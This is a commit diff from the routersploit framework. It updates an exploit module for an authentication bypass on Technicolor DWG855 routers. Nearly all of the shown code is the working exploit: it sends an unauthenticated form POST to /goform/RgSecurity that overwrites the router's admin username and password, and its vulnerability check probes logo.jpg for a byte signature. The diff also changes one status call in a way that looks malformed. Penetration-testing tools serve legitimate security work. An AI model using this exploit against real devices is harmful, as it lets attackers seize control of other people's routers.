Skip to content

R
routersploit
Commit ccfa2dcb by 0BuRner Committed by GitHub
Options

Update dwg855_authbypass.py

parent 6e5c544d
Showing with 7 additions and 13 deletions
routersploit/modules/exploits/technicolor/dwg855_authbypass.py
import binascii
from routersploit import ( from routersploit import (
exploits, exploits,
print_success, print_success,
...@@ -34,14 +32,14 @@ class Exploit(exploits.Exploit): ...@@ -34,14 +32,14 @@ class Exploit(exploits.Exploit):
target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url) target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
port = exploits.Option(80, 'Target Port') port = exploits.Option(80, 'Target Port')
nuser = exploits.Option('ruser', 'Overwrite old user with.. ') nuser = exploits.Option('ruser', 'New user (overwrites existing user)')
npass = exploits.Option('rpass', 'Overwrite old password with.. ') npass = exploits.Option('rpass', 'New password (overwrites existing password)')
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself! # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = binascii.unhexlify('114475636b7900') # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg" vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
def run(self): def run(self):
print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass) print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port)) url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'} headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"} data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
...@@ -72,11 +70,7 @@ class Exploit(exploits.Exploit): ...@@ -72,11 +70,7 @@ class Exploit(exploits.Exploit):
response = http_request(method="GET", url=url, headers=headers) response = http_request(method="GET", url=url, headers=headers)
if response is None: if response is not None and self.vulnresp in response.text.encode('utf-8'):
return False # target is not vulnerable return True
elif self.vulnresp in response.text.encode('utf-8'):
return True # device is vulnerable
elif response.status_code == 401:
return False # target is not vulnerable
else: else:
return False # target is not vulnerable return False
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment